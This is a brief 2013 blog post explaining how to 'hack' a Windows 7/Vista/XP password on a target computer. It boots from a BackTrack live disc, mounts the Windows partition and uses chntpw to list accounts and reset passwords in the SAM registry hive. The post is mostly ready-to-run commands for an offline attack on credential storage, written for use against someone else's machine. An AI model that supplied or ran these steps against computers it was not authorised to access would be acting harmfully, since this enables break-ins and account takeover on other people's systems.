Sunday, 15 December 2013

How to hack Windows7 password using backtrack live

How to Hack Windows 7/Vista/XP Password Using BackTrack?
  1. First of all boot your target computer using BackTrack Live CD or USB drive.
  2. Once Backtrack is booted, log in to the root user account using the default password: toor. Type in startx to start the GUI.
  3. Now go for Application > Privilege Escalation > Password Attacks > Offline Attack > chntpw.
  4. Identify and mount your Windows partition in read/write mode using below commands:
    umount /mnt/hda1
    modprobe fuse
    ntfsmount /dev/hda1 /mnt/hda1

    If your hard disk is SATA type then you need to use /sda1 instead of /hda1 in the above steps.
  5. To list out all the users in the Windows SAM registry hive:
    ./chntpw -l /mnt/hda1/windows/system32/config/SAM
  6. To reset the password for any specific user:
    ./chntpw -u username /mnt/hda1/windows/system32/config/SAM
Post a Comment